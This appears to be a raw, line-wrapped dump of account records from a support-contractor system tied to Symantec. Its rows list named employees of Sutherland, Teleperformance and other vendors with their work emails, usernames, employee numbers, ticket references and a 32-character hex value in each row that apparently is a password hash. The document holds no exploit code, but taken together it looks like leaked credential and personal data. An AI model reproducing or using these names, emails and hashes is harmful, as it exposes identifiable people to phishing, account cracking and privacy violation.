607010 - PR - 27th March 2012,eedd87b3131aaced1fba4c3160997693,Bhosale,<blank>,2
23115,Aniket,NULL,NULL,NULL
05b-4907-a227-35e907835ddc,<blank>,<blank>,SantoshHarkhu_Gupta@SUTH.COM,Sutherla
nd,a78c740ee5a00d4f1b5fc35dc4de4af4,Harkhu,<blank>,Santosh_Harkhu_Gupta,Santosh,
NULL,NULL,NULL
474-4105-b3c2-9b129da0a982,<blank>,<blank>,Santosh_Korde@suth.com,Sutherland,cf0
2b5fa481a591815ef8feb2977abd8,Korde,<blank>,Santosh_Korde,Santosh,NULL,NULL,NULL
3fd-40dd-98f6-e68b6f835f08,<blank>,<blank>,Santosh_Anchan@SUTH.COM,Sutherland,fe
edcd72aafa34e0b093b7fb41c6d0c5,Koti,<blank>,Santosh_Koti_Anchan,Santosh,NULL,NUL
L,NULL
053-4291-b74c-86537dd2e429,<blank>,<blank>,Santosh_Mishra@SUTH.COM,Sutherland,56
51d682418555001f68cadb49fb9a9a,Radheshyam,<blank>,Santosh_Radheshyam_Mishra,Sant
osh,NULL,NULL,NULL
168-471c-af23-bf919e614882,<blank>,<blank>,Sanu_S@SUTH.COM,Sutherland,24aec95c12
7117a1956bfb96a739ee3f,S,<blank>,Sanu_S,Sanu,NULL,NULL,NULL
b09-453a-bb69-e19383519ae1,<blank>,<blank>,Sanusha_Jayaprakash@SUTH.COM,Sutherla
nd,5e4e8523ce8a138f9ff8d7ead417d27e,Jayaprakash,<blank>,Sanusha_Jayaprakash,Sanu
sha,NULL,NULL,NULL
648-406d-9927-b44fcb1dd93f,<blank>,<blank>,Sapna_Raje@SUTH.COM,Sutherland,dace85
483c14ade12025c4914ff7fa3f,Vinod,<blank>,Sapna_Vinod_Raje,Sapna,NULL,NULL,NULL
19b-4904-bdc5-f3aae239fb48,<blank>,<blank>,Saradhi_M@SUTH.COM,Sutherland,26a5de4
d459cd12efff3b70cbf122669,M,<blank>,Saradhi_M,Saradhi,NULL,NULL,NULL
20ff-48e1-b26a-590f895b3940,CRQ000000624252--vmd--11/04/2012,<blank>,etseridou@s
ymantec.teleperformance.gr,Teleperformance,d6f6cbf0dd869e993f1f89a4f5c428f0,Tser
idou,<blank>,223759,Eva,NULL,NULL,NULL
1e8-4814-a84d-5ef1511f24ee,<blank>,<blank>,Sarat_KS@SUTH.COM,Sutherland,755c912a
bd0c3ce7d80f61b07f1581a8,K,<blank>,Sarat_K_S,Sarat,NULL,NULL,NULL
cdd-4b4f-abfe-3675cbc328ef,<blank>,<blank>,SharatChandra_N@SUTH.COM,Sutherland,d
89acdb33287e5c05c7ea6b229787738,Chandra,<blank>,Sarath_Chandra_N,Sarath,NULL,NUL
L,NULL
adc-491c-8e2d-e93f0a1097aa,<blank>,<blank>,Saravan_Kavaratty@suth.com,Sutherland
,d1a570584855962ea225e0bfe233899f,Kumar,<blank>,Saravan_Kumar_Kavaratty_Rajamani
,Saravan,NULL,NULL,NULL
a8f-4045-8e9c-52694fd6eb9d,<blank>,<blank>,SaravanaDeepan_A@SUTH.COM,Sutherland,
751ff3e35a16e6342cf11cac44bc65ad,Deepan,<blank>,Saravana_Deepan_A,Saravana,NULL,
NULL,NULL
167-4bf9-9274-93e29edc34e8,<blank>,EMPROV,accounts@symantec.teleperformance.gr,T
PG,7c6cc52ad342a983778431c3ff9fd099,Katsamentidou,<blank>,092598,Panagiota,NULL,
NULL,NULL
56b-41b6-880f-c2f7ca76c643,<blank>,<blank>,Saravanan_S2@SUTH.COM,Sutherland,9b8b
671cddbfe0038dbabd4e4b760311,S,<blank>,Saravanan_S,Saravanan,NULL,NULL,NULL
d56-4d8f-b8b7-dce6379b8769,<blank>,<blank>,VinothRaj_AJ@SUTH.COM,Sutherland,62f8
b26c6353c2cd95761f054b71a32a,Raj,<blank>,Vinoth_Raj_A_J,Vinoth,NULL,NULL,NULL
ddc-4405-b170-d4537e80afda,<blank>,<blank>,Vinoth_S@SUTH.COM,Sutherland,8e723d52
4be44105d9d8a2b93e6372f8,S,<blank>,Vinoth_S,Vinoth,NULL,NULL,NULL
de2-457b-8757-ff12b31e81e8,<blank>,<blank>,Vinoth@suth.com,Sutherland,ef3aaa5733
ce4df657a9107512af192b,Samdoss,<blank>,Vinoth_Samdoss_Spencer,Vinoth,NULL,NULL,N
ULL
ada-4fd8-8e52-464eb0778229,<blank>,EMPROV,symaccount@ipcdoctor.co.kr,ipcdoctor,7
5ae8739bcb5aa2d10468a2face27e59,Fuji,<blank>,088837,Akiko,NULL,NULL,NULL
f820-4c4e-bfb9-401beb20a01a,"CRQ000000682605 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,e747bc70e86764009fb68fd9644bc8cd,Chettiar,<bl
ank>,226246,Robin,NULL,NULL,NULL
dc5-4849-9430-455413b4bc85,<blank>,085298,roger_bascue@symantec.com,<blank>,d2cd
536e3da7a7aa6f93ff6439428963,Bascue,<blank>,Roger_Bascue,Roger,NULL,NULL,NULL
fe4-4dab-9770-79100ada0be3,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,59ef275fe905eb580084ee7b8d45ef2b,Bhaskaran,<blank>,Vishal_Bhaskaran_Nair,Vishal
,NULL,NULL,NULL
38cf-4efb-9608-ecc743bfe416,sms 20.09.10,<blank>,accounts@symantec.teleperforman
ce.gr,Teleperformance,94746df05425efe1a6680ec4e908645c,Calloni,<blank>,109062,Cl
audio,NULL,NULL,NULL
01eb-4dd0-a5bd-b3df9709bead,CRQ000000598539--vmd--21/03/2012,000-000,clarenceiva
n_oredina@Suth.com,Sutherland,aa1af54913ad4e96cc3f010856645484,Oredina,<blank>,2
22538,ClarenceIvan,NULL,NULL,NULL
4cb-4be4-9610-7ec1a7fcaeea,<blank>,<blank>,Vishal_Narsian@suth.com,Sutherland,12
18bd7c3a456ea614a9e3628c2002c9,Sham,<blank>,Vishal_Sham_Narsian,Vishal,NULL,NULL
,NULL
af2-4965-8ed0-7c64d2140934,<blank>,<blank>,sgvishal@suth.com,Sutherland,ce248098
5a9beb8ce61936eb225d92d3,Sudhir,<blank>,Vishal_Sudhir_Gupta,Vishal,NULL,NULL,NUL
L
d81e-4de9-b610-831e86f4d6a9,CRQ000000598545--vmd--21/03/2012,000-000,marieantone
tte_ricar@Suth.com,Sutherland,4545533e704fb2a7724873e3a5c7b10c,Ricarte,<blank>,2
22539,MarieAntonette,NULL,NULL,NULL
70f-4f98-94c6-65af9d0063d4,<blank>,<blank>,VishnuPrasadMacha_B@SUTH.COM,Sutherla
nd,989a290d8cd0c447c48c0711d1176cbe,Prasad,<blank>,Vishnu_Prasad_Macha_B,Vishnu,
NULL,NULL,NULL
6a8-4ec3-904e-5ecef841dd8c,<blank>,<blank>,VishnuSivathej_P@SUTH.COM,Sutherland,
b8fcc3a7f3815af1824bd44456f5dfdc,Sivathej,<blank>,Vishnu_Sivathej_P,Vishnu,NULL,
NULL,NULL
af67-4efc-bb1b-93bcd46af0da,CRQ000000598563--vmd--21/03/2012,000-000,mariacarlot
a_simbula@Suth.com,Sutherland,aab1e79874263d2e1de2beec9b5449a8,Simbulan,<blank>,
222542,MariaCarlota,NULL,NULL,NULL
498-4848-a217-4f30e9e7cde5,<blank>,<blank>,Vivek_Madhavan@SUTH.COM,Sutherland,97
ca15befacc66d438abf3515735c830,Madhavan,<blank>,Vivek_Madhavan,Vivek,NULL,NULL,N
ULL
ab9-4308-a57d-f4343a46154c,<blank>,<blank>,MWWilso2@suth.com,Sutherland,6470a6db
8423744354e3292d9e3ca6c0,William,<blank>,Wilson_William_Manezes,Wilson,NULL,NULL
,NULL
c40-4b89-8c47-91409b45b45e,<blank>,<blank>,XavierCosmas_Fernandes@SUTH.COM,Suthe
rland,873b85b77c8aaa2dce008ed68dc34944,Cosmas,<blank>,Xavier_Cosmas_Fernandes,Xa
vier,NULL,NULL,NULL
fd0-487c-8b47-38c1dcd3f014,<blank>,<blank>,Xavier_Fernandes1@SUTH.COM,Sutherland
,36e9ea8d8222c477566ddb5ddac2ee78,Laurel,<blank>,Xavier_Laurel_Fernandes,Xavier,
NULL,NULL,NULL
746-4fb9-8b1d-75d28708e411,<blank>,<blank>,Xavier_Philip@SUTH.COM,Sutherland,01d
847bac488640918e8ba64854c192d,Vijay,<blank>,Xavier_Vijay_Philip,Xavier,NULL,NULL
,NULL
8bd-42f3-ac97-774d9dd02de9,<blank>,<blank>,YacoobHussain_H@SUTH.COM,Sutherland,b
99a0bf052fc4512c1d866909689b971,Hussain,<blank>,Yacoob_Hussain_H,Yacoob,NULL,NUL
L,NULL
c26-416b-9e2c-5ef15d3c1113,<blank>,<blank>,Iqbal_Yakub@SUTH.COM,Sutherland,43997
26cf2787b02895ab469f17d9bac,Shaikh,<blank>,Yakub_Shaikh_Iqbal,Yakub,NULL,NULL,NU
LL
e6d-4691-afbe-db51f85c384d,<blank>,<blank>,Yeshupalsing_Vasave@SUTH.COM,Sutherla
nd,2a1f69d1686897ae4ec1e36156dbd1a5,Vasave,<blank>,Yeshupalsing_Vasave,Yeshupals
ing,NULL,NULL,NULL
278-4482-a497-87ec3c02a33f,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,ceeb3535e6ccc3f5294e3bb5c8304420,Kassam,<blank>,Zaheer_Kassam_Turk,Zaheer,NULL,
NULL,NULL
77a-4696-9ef0-0df5341e0478,<blank>,<blank>,ZeeshanMohamed_K@SUTH.COM,Sutherland,
3244d9fc8b847a7814cfa02d957e9664,Mohamed,<blank>,Zeeshan_Mohamed_K,Zeeshan,NULL,
NULL,NULL
f42-4d30-9625-8f9b6df9637b,<blank>,<blank>,Sarvesh_Subramani@suth.com,Sutherland
,4bed869d5b8a42e2377f218b1eeae9a7,Neelakanta,<blank>,Sarvesh_Neelakanta,Sarvesh,
NULL,NULL,NULL
c7eb-4e15-b983-0c28718117c3,02/06/2010 - SPJ,INC184885,tools_id@symantec.suth.co
m,Sutherland,b523a37c5f028e113c9799e617802980,Rekha,<blank>,088352,Sashi,NULL,NU
LL,NULL
c0b-404d-a12e-26b8171d952e,<blank>,EMPROV,james_kwon@symantec.com,K-TEC,eebee5e0
34bf4538c61740423b7e2ae5,Choi,<blank>,091998,Ji-Hyun,NULL,NULL,NULL
415-4dee-8125-b3df3e463984,<blank>,<blank>,Vipul_Agarwal@SUTH.COM,Sutherland,bd8
f908c76b25fa87a063b6fd2f2d643,Subhash,<blank>,Vipul_Subhash_Agarwal,Vipul,NULL,N
ULL,NULL
30c-4d36-8bbe-c6d6a68cefdd,<blank>,<blank>,Vishnu_Agarwal@suth.com,Sutherland,25
f929815f0b94f8da9c86dcc5ea4a6a,Ramniwas,<blank>,Vishnu_Ramniwas_Agarwal,Vishnu,N
ULL,NULL,NULL
86f-435d-9606-a2684cd1b4c6,<blank>,<blank>,Visudh_VS@SUTH.COM,Sutherland,2ef9843
7093fbcb4f848ec48cae1a199,V,<blank>,Visudh_V_S,Visudh,NULL,NULL,NULL
96b-4f67-8973-6f1120f228ef,<blank>,<blank>,Vivek_Krishnan@SUTH.COM,Sutherland,87
cf1300c7c62711dd79c838af13a32b,Krishnan,<blank>,Vivek_Krishnan,Vivek,NULL,NULL,N
ULL
fc2-4f17-ab59-5b98bc387eec,<blank>,<blank>,Vivek_Motherao@SUTH.COM,Sutherland,ea
426df15423a2141bef2aadaaee15b9,Mahadev,<blank>,Vivek_Mahadev_Motherao,Vivek,NULL
,NULL,NULL
fb3-4660-a5cd-d660307c9b33,<blank>,EMPROV,symaccount@clts.com,CLTS,2e417e51e82f0
997ec2811dc9780c27c,Che,<blank>,088840,Mingying,NULL,NULL,NULL
9183-4b7b-88c4-b7aaa55412fa,<blank>,<blank>,gveroudakis@symantec.teleperformance
.gr,CT - 12/09/2012 - CRQ000000800948,f59d102d622dd333883b3663b5a93570,Veroudaki
s,<blank>,229979,Georgios,NULL,NULL,NULL
494-4710-a9b7-cac0f1fce21d,<blank>,<blank>,Wesley_Matthew@SUTH.COM,Sutherland,13
a78dc50b05da8ec90dcb7386d54738,Matthew,<blank>,Wesley_Matthew,Wesley,NULL,NULL,N
ULL
d147-4796-a2fe-7f1e5e63583c,CRQ000000273430--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,9a3ba53aa9c6a15d6ef90b05d61b8e2f,Moses,<blank>,116969
,Anthony,NULL,NULL,NULL
d743-4c8b-9889-a8e35bc39a4f,CRQ000000601657--vmd--22/03/2012,<blank>,anaruscehle
_enerva@Suth.com,Sutherland,c7fc2bcc9b8f63552b46868034e047e7,Enerva,<blank>,2226
21,Anaruscehle,NULL,NULL,NULL
b4d-4502-9089-59c9ca9e0281,<blank>,<blank>,Yogesh_Salvi@SUTH.COM,Sutherland,b0df
dcef1d0087951ca7d03b426c3eb1,Anant,<blank>,Yogesh_Anant_Salvi,Yogesh,NULL,NULL,N
ULL
617-4866-a36f-05b33f423432,<blank>,<blank>,Yugaselvi_S@SUTH.COM,Sutherland,c37bd
dee3e7be8eb8acab7cda8fcd695,S,<blank>,Yugaselvi_S,Yugaselvi,NULL,NULL,NULL
9c4-447f-80fb-cb82b311bfc9,<blank>,<blank>,Zaheer_Ansari@SUTH.COM,Sutherland,42b
8246988b88fc01e6efc1c7403f579,Yaqub,<blank>,Zaheer_Yaqub_Ansari,Zaheer,NULL,NULL
,NULL
cdc-4c88-a36d-b01e9b179627,WS 16-07-2010,2633282/INC213497,tools_id@symantec.sut
h.com,Sutherland,5527c5bcbf7a1043cacde36e40f2015d,Sudhakar,<blank>,Zion_Sudhakar
_Dabholkar,Zion,NULL,NULL,NULL
e13-477a-b20a-9f20b9866c66,<blank>,<blank>,Sachin_G@suth.com,Sutherland,0f05067d
1436b504046a7f2eb9e47598,Ganpat,<blank>,Sachin_Ganpat,Sachin,NULL,NULL,NULL
8d3-488a-b9f8-d6a2bbb31034,<blank>,<blank>,ksami@suth.com,Sutherland,ac26b56f008
472ddca71154c66af6c44,Khuthubuddin,<blank>,Saminuddin_Khuthubuddin,Saminuddin,NU
LL,NULL,NULL
9ec-4442-ab8e-428d04bb6bfb,<blank>,<blank>,Saurabh_Maratha@suth.com,Sutherland,1
1e6f5f267dfae31fa91137c61139bd1,Maratha,<blank>,Saurbh_Maratha,Saurbh,NULL,NULL,
NULL
873-43da-a187-f8f029f618f3,<blank>,<blank>,shankar_ks@suth.com,Sutherland,49aadd
9f1d3aa9e2a9d6d8175d02f5d2,Kaveripakkam,<blank>,Shankar_Kaveripakkam,Shankar,NUL
L,NULL,NULL
782-4f28-8f92-cff934840e35,<blank>,<blank>,Vijai_J@suth.com,Sutherland,9496c1b0c
1012b8f7eec7d547635985c,Anand,<blank>,Vijai_Anand,Vijai,NULL,NULL,NULL
0a3-4e86-b33e-67ebfe97fc8c,<blank>,<blank>,Vivek_Sharma@suth.com,Sutherland,dd05
a79008b18d37331902fa491996f6,Vijay,<blank>,Vivek_Vijay,Vivek,NULL,NULL,NULL
223-44fc-aea5-4734cabc0790,<blank>,<blank>,Saravanan_S4@SUTH.COM,Sutherland,b1b9
6f32a403b1870a881de6d50fb443,S,<blank>,Saravanan_S4,Saravanan,NULL,NULL,NULL
ead-4e39-8551-d33021e6d29d,<blank>,<blank>,Suresh_S2@SUTH.COM,Sutherland,cf76a2f
1ad5e4538ffe67e4465341ca8,S,<blank>,Suresh_S2,Suresh,NULL,NULL,NULL
0cef-4006-b93a-09b615c22992,CRQ000000601660--vmd--22/03/2012,<blank>,francisjohn
_garcia@Suth.com,Sutherland,e25a89989694ec48a4c583028316a9c8,Garcia,<blank>,2226
23,Francis John,NULL,NULL,NULL
a88-4117-b0cd-3ecd0be39498,<blank>,<blank>,steve_burnette@symantec.com,Symantec,
07e897b4767551cd87a95bfc07c78c88,Burnette,<blank>,Steve_Burnette,Steve,NULL,NULL
,NULL
833-44f4-bbb7-a00d88a90be4,<blank>,<blank>,craig_fry@symantec.com,Symantec,7b114
4d9826327858007d9f5d2fe4b98,Fry,<blank>,Craig_Fry,Craig,NULL,NULL,NULL
e5d-4a5d-b564-e78f22012541,29/06/2010 - SPJ,CRQ85915,valerie_davidbyrne@symantec
.com,Symantec,b6a20fa759b93096ace4491d01bc08d1,David,<blank>,Valerie_David,Valer
ie,NULL,NULL,NULL
112-41b2-a743-a997a5850593,<blank>,<blank>,Thomas_Mathew@suth.com,Sutherland,6ac
935ea6065f68dd301b288cd75bb97,Mathew,<blank>,Thomas_Mathew,Thomas,NULL,NULL,NULL
6581-4bcf-be08-01a0add57fa9,"CRQ000000602159 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,ba973c2c2d5dd0711245ff63dc127303,Principe,<blan
k>,222573,BlouhDaphne,NULL,NULL,NULL
0ff-4825-9416-62684e43ad16,<blank>,<blank>,SathishKumar_J3@SUTH.COM,Sutherland,8
90b76ab7c8f35c14d7e66f581cc246f,Kumar,<blank>,Sathish_Kumar_J3,Sathish,NULL,NULL
,NULL
9ae-4747-9320-05ebb41eded9,<blank>,<blank>,Vyas_Rajkumar@SUTH.COM,Sutherland,c70
10a837f1f8f7be928d0fa539b2190,Rajkumar,<blank>,Vyas_Rajkumar1,Vyas,NULL,NULL,NUL
L
ed07-4ff1-9767-875387cc1c43,"CRQ000000830016 CLNP Oct 08,2012",000-0000,jamesmic
hael_mercado@symantec.com,Symantec,ca5bdea674b34265be623fafa8d87212,Mercado,<bla
nk>,230600,James Michael,NULL,NULL,NULL
af22-4d65-aa89-196ee8658550,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692534 - PR - 12th June 2012,854a4bd9a4bb9efdce368e5152648589,Crisostomo,<bla
nk>,226656,Gervic,NULL,NULL,NULL
fd1-40d9-8069-1f89e4e4604b,<blank>,<blank>,mercedes_fernandez@symantec.com,Syman
tec,fa49746107d9ade8baf4d005b6caddba,Fernandez,<blank>,Mercedes_Fernandez,Merced
es,NULL,NULL,NULL
24a2-431c-b054-6591fbd4a67b,CRQ000000241079 PBP 15/04/2011,<blank>,Ganesh_Kumar@
symantec.com,Symantec,5c87204b81db7a0c77c93eb66abee2d5,Kumar,<blank>,114476,Gane
sh,NULL,NULL,NULL
a94-47b8-8335-d01ce6369369,<blank>,<blank>,emilie_wallart@symantec.com,Symantec,
7863a9a4200d4ce1b9ba3d5c7a2351f5,Wallart,<blank>,Emilie_Wallart,Emilie,NULL,NULL
,NULL
3e1-41c9-be15-20ffc82570bd,<blank>,<blank>,Elisabetta_Valentini@symantec.com,Sym
antec,4335b0473308e905fe4ba14607a7ed5a,Valentini,<blank>,Elisabetta_Valentini,El
isabetta,NULL,NULL,NULL
476-47d5-b435-6e9688c2d95f,<blank>,<blank>,Edouard_Elias@symantec.com,Symantec,6
81d1644a02c5b3b99066ca73782bde8,Elias,<blank>,Edouard_Elias,Edouard,NULL,NULL,NU
LL
eb2-47d3-ade2-18a7d65dfd1c,<blank>,<blank>,bMaillard@symantec.com,Symantec,46ce2
63425f780bf3fece304f94ed889,Maillard,<blank>,Benedicte_Maillard,Benedicte,NULL,N
ULL,NULL
c4e-4484-8f5e-e1e604dd3985,<blank>,7408,marie_hagstrom@symantec.com,Symantec,f40
cdf558bf0f5f3a7f4509189d247e7,Hagstrom,<blank>,marie_hagstrom,Marie,NULL,NULL,NU
LL
12c-4861-9ad9-60ee6e87ddf7,<blank>,<blank>,cecile_point@symantec.com,Symantec,61
f89276727461168cfed20275390b8e,Point,<blank>,Cecile_Point,Cecile,NULL,NULL,NULL
787-4887-a0bf-99c7ffffbb2e,<blank>,084770,randy_layton@symantec.com,<blank>,79b1
5e4c59d3d08b9a9bc49c25cae0e5,Layton,<blank>,Randy_Layton,Randy,NULL,NULL,NULL
af0-456f-959e-94574823f9a6,<blank>,86248,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",d008eeac942d2525adbcf14ba91eab19,Veeraraghavan,<blank>,ja
gadeesh_veeraragha,Jagadeesh,NULL,NULL,NULL
50d4-44ad-945a-7bb19e573624,CRQ000000274386--VMD--10/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,c0f067f95d3edc2bdbbcd045f2790c94,Salise,<blank>,11703
5,Alfredo,NULL,NULL,NULL
98b2-40e3-ac99-77304c779173,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,97127d1501dbf37b54873edb68a4ad20,Marcelo,<blank>,110051,Armandraymond,NULL,
NULL,NULL
4b33-4f1d-bd82-cc2ae9fa3c8b,CRQ000000241079 PBP 15/04/2011,<blank>,Praveen_Kumar
9@symantec.com,Symantec,d558a75da8d72f9744f5d1eb04b92174,kumar9,<blank>,114492,P
raveen,NULL,NULL,NULL
b18c-4d79-8702-66b4bf468abc,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,0
e2234b6c07d576f3cfc39c50656b03b,Fiazuddin,<blank>,108875,Mohammed,NULL,NULL,NULL
1c4d-4a64-8d83-ca3b947c6a0c,CRQ000000444069 - CLNP Dec 08 2011,000-0000,tools_id
@symantec.suth.com,Sutherland,ffa9b4f9c8355a54c893661ccb375273,Tabugon,<blank>,1
22836,Jiku Ongcay,NULL,NULL,NULL
2943-4dd9-a4f3-838a763d13bf,CRQ000000274426--VMD--10/06/11,000-000,tools_id@syma
ntec.suth.com,Sutherland,cd695f7ba1d3518dff642acd0f34dc13,Bucao,<blank>,117042,M
edily,NULL,NULL,NULL
235e-465f-b38d-19d7d7f416b4,CRQ000000641931--vmd--27/04/2012,000-000,sunny_malde
@suth.com,sutherland,0d953cf73855d6ecf44b0c94f9418ae3,Malde,<blank>,224254,Sunny
,NULL,NULL,NULL
236b-4bde-94e4-d0ac8c990600,CRQ000000641937--vmd--27/04/2012,000-000,prasad_bhos
ale@suth.com,sutherland,3032a5813baee741d9617ed59f290b42,Bhosale,<blank>,224256,
Prasad,NULL,NULL,NULL
ce8d-49f7-80d9-561c99795a98,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,b
cb506da0bd07e9fbcb82673e9c40085,Panda,<blank>,109714,BhairabPrasad,NULL,NULL,NUL
L
7469-49b9-bd36-7e4eeb9983a0,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,3dc277ec3581285e4d2898282bb32a07,R,<blank>,089485,"R,Deepesh",NULL,NULL,NULL
5a5b-450f-b4d1-f4ffb3cde75a,<blank>,<blank>,stanley_lawrans@symantec.com,CR00000
00100006 - PR - 12th June 2012,96fa7ee05ff78f288fdbc3637bdedfd5,Florendo,<blank
>,226639,Flor,NULL,NULL,NULL
f131-4285-9c29-5366a6c0b220,<blank>,<blank>,dimitra_aggelopoulou@symantec.com,CT
- 08/06/2012 - CRQ000000687730,bb46f2a1bbb001fe97faf63b58308ae2,Aggelopoulou,<b
lank>,067008,Dimitra,NULL,NULL,NULL
b1d7-4afa-b052-88f0fbc7ca1f,<blank>,<blank>,Elaine_Legarda@SPI.COM,PM - 6/14/201
2 - CRQ000000694455,b35b3ebae88b593e758db9ea736ddbfd,Legarda,<blank>,226705,Elai
ne,NULL,NULL,NULL
028-47aa-9b69-d89c79bfc6e4,<blank>,<blank>,DuraiRaj_V@SUTH.COM,Sutherland,418d6b
41f49bbb84aed560555c07826a,V,<blank>,DuraiRaj_V,Durai Raj,NULL,NULL,NULL
17e2-40ee-b8ad-a748613d409f,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
734367 - PR - 17th July 2012,60ec7404020fa4c4f057e4e9063459f5,Abon,<blank>,22805
9,Maureen Vi T Estrella ,NULL,NULL,NULL
511-4a87-ba0e-a8a590e9a5cf,<blank>,90005/2635091,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",f9504be5b08c28af487cd812e82098d8,PA,<blank>,aneer
_pa,Aneer,NULL,NULL,NULL
a857-4c4d-8e6c-ddcbed71ebca,CRQ000000439491-CLNP Dec 06 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,e185aa136ca463b51cf0214977228a61,Sison,<blank>,12281
5,Juan Miguel Liangco,NULL,NULL,NULL
35c4-42b0-bc7f-347090359a8a,VMD--CRQ000000444007--08/12/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,66f44049f120cf2d53a2915ef7e4054b,Abayato,<blank>,1228
16,Joylen Deguinon,NULL,NULL,NULL
5e7-4efc-8691-0fe11aec4f65,<blank>,<blank>,EnriqueJr._Llorente@SUTH.COM,Sutherla
nd,e7c6ea83b64ef634733cadc849fcc4ec,LabesoresLlorente,<blank>,EnriqueJr_Llorente
,EnriqueJr.,NULL,NULL,NULL
8780-46db-9dc1-e11495d9e009,CRQ000000241079 PBP 15/04/2011,<blank>,Rubesh_Krishn
an@symantec.com,Symantec,860c79d407f12957ad9e5012ca9e4930,krishnan,<blank>,11441
2,Rubesh,NULL,NULL,NULL
570d-40c6-a4f8-abbf6d0183b2,CRQ000000241079 PBP 15/04/2011,<blank>,Naresh_Kumar2
@symantec.com,Symantec,737374fa57ffab330ae1eb7f942ea155,Kumar2,<blank>,114407,Na
resh,NULL,NULL,NULL
7e0-493a-8acb-60a34e061163,<blank>,<blank>,Francis_Pepe@SUTH.COM,Sutherland,e5e6
fa2f2575d794b15e17a2b652861a,Pepe,<blank>,Francis_Pepe,Francis,NULL,NULL,NULL
b3e3-470f-b655-8188b5c29b38,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,0
f8b3323dd3f9225decd08dac954ca73,Makkinudeen,<blank>,108876,MohammedSalahuddin,NU
LL,NULL,NULL
bca1-4647-85f1-0b9a31a4d493,CRQ000000603619--vmd--23/03/2012,<blank>,allannio_ro
driguez@Suth.com,Sutherland,6162952d1abadcfcca12c35e290eae91,Rodriguez,<blank>,2
22677,AllanNio,NULL,NULL,NULL
bb25-44c2-be62-f56087cc942b,CRQ000000603622--vmd--23/03/2012,<blank>,stephen_sal
ido@Suth.com,Sutherland,aa9cbbbeb48b1ab0555ce60debb08fe8,Salido,<blank>,222679,S
tephen,NULL,NULL,NULL
5372-4a6e-b60c-a48c78e14798,REQ000001320761--vmd--23/03/2012,<blank>,marlina_san
tos@Suth.com,Sutherland,fdd66ddbb3b93d36ec088ab7f4361898,Santos,<blank>,222683,M
arlina,NULL,NULL,NULL
6c9-48c7-aa32-8449e67213fe,<blank>,2632350,tools_id@symantec.suth.com,Sutherland
,9d84c63f7015a8ed016736b085f7e721,R,<blank>,GnanaMoorthy_R,Gnana Mooethy,NULL,NU
LL,NULL
7eb-4080-9fa3-47a5cc0aa3f2,<blank>,<blank>,bnugent@symantec.com,Helpdesk,9669882
1ccac1b0cc09c02ced7a98569,Nugent,<blank>,brandon_nugent_hd,Brandon,NULL,NULL,NUL
L
7f52-4936-97cb-d7d17c550f79,sms 29,INC000000197662,Tools_ID@Symantec.Suth.Com,Su
therland,364a357d03b0b8f432a206aa7bb17d12,JomeroGonzales,<blank>,103081,Jennie,N
ULL,NULL,NULL
5a9-42cd-8b34-15779ee919c9,<blank>,<blank>,GopalaKrishna_Pabinedi@SUTH.COM,Suthe
rland,2a7a2a2e1a828d0d7929b2206fff9de8,Pabinedi,<blank>,GopalaKrishna_Pabinedi,G
opala Krishna,NULL,NULL,NULL
4c09-40b0-821d-46a1641248f3,CRQ000000603634--vmd--23/03/2012,<blank>,adelaida_ta
pay@Suth.com,Sutherland,abee2aa512674a0c03d987ed1dd20ee2,Tapay,<blank>,222684,Ad
elaida,NULL,NULL,NULL
ced6-4cc0-a87d-ac303a7fce20,SRB 24.08.2010,INC000000249136,tools_id@symantec.sut
h.com,Sutherland,9958e90c733e322647fa2f4649fc8e73,Lade,<blank>,105262,Prem Kumar
,NULL,NULL,NULL
a9e7-42e6-b620-cfdfb0427f87,<blank>,emprov/30955,tools_id@symantec.suth.com,suth
erland,d5a2162795cc9a8ffa948460e746b824,Momtaj,<blank>,095040,Shaik Sidiquee,NUL
L,NULL,NULL
566a-4f17-b2a5-61c8732b1879,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,6
16369617d22ca47b41c50323d323d5a,Naaz,<blank>,089238,Shaista,NULL,NULL,NULL
7b97-4f18-a638-e78639b456ee,CRQ000000241079,<blank>,MFakirMohamed_Rameez@symante
c.com,ksc-04/15/2011,2c8235f0e4eda809866247052070540b,Rameez,<blank>,114483,MFak
irMohamed,NULL,NULL,NULL
b6d-4bba-870f-ad955000c53a,<blank>,<blank>,Hannah_Ganesamoorthy@SUTH.COM,Sutherl
and,5a7014bf4bc4f69a2e135ca5231f98f2,Ganesamoorthy,<blank>,Hannah_Ganesamoorthy,
Hannah,NULL,NULL,NULL
122-4d13-ba10-93c09316c738,<blank>,<blank>,Haritha_T@SUTH.COM,Sutherland,5981c88
d65685448015d9bc545d2590a,T,<blank>,Haritha_T,Haritha,NULL,NULL,NULL
5de-47bc-853f-2a3a274cd42e,<blank>,<blank>,DouglasJ_Tompkins@SUTH.COM,Sutherland
,36b945741f899a8ee11e35af09107672,J Tompkins,<blank>,DouglasJ_Tompkins,Douglas,N
ULL,NULL,NULL
a40b-4173-be98-fb25ef40ef3f,<blank>,<blank>,napoleonpaul_golez@SPI.COM,PM - 8/28
/2012 - CRQ000000783711,71a6c5f6b842f5a53a56a9de47c69b4c,Golez,<blank>,229460,Na
poleon Paul,NULL,NULL,NULL
e0c-4d70-8a95-8b0be4c58ead,<blank>,<blank>,EllardRobertM_Manguera@SUTH.COM,Suthe
rland,28f336126cc3da36b4221d877e25c9dc,RobertManguera,<blank>,EllardRobertM_Mang
uera,Ellard,NULL,NULL,NULL
2ee5-4610-80c9-9103fedcda43,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716129,d9cc016496ec501e78a9a436219138ad,Alingasa,<blank>,227437,Rollan Jay ,NULL
,NULL,NULL
